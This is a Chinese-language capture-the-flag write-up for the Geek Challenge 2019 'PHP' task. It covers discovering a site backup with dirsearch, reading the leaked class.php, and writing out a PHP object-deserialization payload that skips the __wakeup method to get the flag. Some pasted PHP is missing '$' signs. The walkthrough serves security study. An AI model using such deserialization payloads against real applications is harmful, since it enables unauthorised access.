19,[极客大挑战 2019]PHP1

这个好玩

看到备份网站字眼,用dirsearch扫描

在kali里打开

爆破出一个www.zip文件

访问一下

解压后是这个页面

class.php

<?php

include 'flag.php';

error_reporting(0);

class Name{

private $username = 'nonono';

private $password = 'yesyes';

public function __construct(username,password){

this-\>username = username;

this-\>password = password;

}

function __wakeup(){

$this->username = 'guest';

}

function __destruct(){

if ($this->password != 100) {

echo "</br>NO!!!hacker!!!</br>";

echo "You name is: ";

echo $this->username;echo "</br>";

echo "You password is: ";

echo $this->password;echo "</br>";

die();

}

if ($this->username === 'admin') {

global $flag;

echo $flag;

}else{

echo "</br>hello my friend~~</br>sorry i can't give you the flag!";

die();

}

}

}

?>

username=admin

password=100

flag.php

<?php

$flag = 'Syc{dog_dog_dog_dog}';

?>

index.php

<!DOCTYPE html>

<head>

<meta charset="UTF-8">

<title>I have a cat!</title>

<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/meyer-reset/2.0/reset.min.css">

<link rel="stylesheet" href="style.css">

</head>

<style>

#login{

position: absolute;

top: 50%;

left:50%;

margin: -150px 0 0 -150px;

width: 300px;

height: 300px;

}

h4{

font-size: 2em;

margin: 0.67em 0;

}

</style>

<body>

<div id="world">

<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 85%;left: 440px;font-family:KaiTi;">因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯

</div>

<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 80%;left: 700px;font-family:KaiTi;">不愧是我!!!

</div>

<div style="text-shadow:0px 0px 5px;font-family:arial;color:black;font-size:20px;position: absolute;bottom: 70%;left: 640px;font-family:KaiTi;">

<?php
include 'class.php';
select = _GET['select'];
res=unserialize(@select);
?>

</div>

<div style="position: absolute;bottom: 5%;width: 99%;"><p align="center" style="font:italic 15px Georgia,serif;color:white;"> Syclover @ cl4y</p></div>

</div>

<script src='http://cdnjs.cloudflare.com/ajax/libs/three.js/r70/three.min.js'></script>

<script src='http://cdnjs.cloudflare.com/ajax/libs/gsap/1.16.1/TweenMax.min.js'></script>

<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/OrbitControls.js'></script>

<script src='https://s3-us-west-2.amazonaws.com/s.cdpn.io/264161/Cat.js'></script>

<script src="index.js"></script>

</body>

</html>

index.php中有个注释

**include 'class.php';**提到了class.php

**select = _GET['select'];**定义了一个存放GET请求方法的变量select

**res=unserialize(@select);**将一个字符串反序列化为一个PHP变量

<?php

class Name{

private $username = 'admin';

private $password = '100';

}

$select = new Name();

res = serialize(@select);

echo $res

?>

运行得到反序列化代码

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

相关推荐
Y40900138 分钟前
C语言转Java语言,相同与相异之处
java·c语言·开发语言·笔记
笑衬人心。41 分钟前
TCP 拥塞控制算法 —— 慢启动(Slow Start)笔记
笔记·tcp/ip·php
花海如潮淹1 小时前
前端性能追踪工具:用户体验的毫秒战争
前端·笔记·ux
Andy杨2 小时前
20250718-5-Kubernetes 调度-Pod对象:重启策略+健康检查_笔记
笔记·容器·kubernetes
天天进步20156 小时前
前端安全指南:防御XSS与CSRF攻击
前端·安全·xss
杭州杭州杭州7 小时前
Python笔记
开发语言·笔记·python
nington0110 小时前
面对微软AD的安全隐患,宁盾身份域管如何设计安全性
安全
iFulling10 小时前
【计算机网络】第四章:网络层(上)
学习·计算机网络
香蕉可乐荷包蛋11 小时前
AI算法之图像识别与分类
人工智能·学习·算法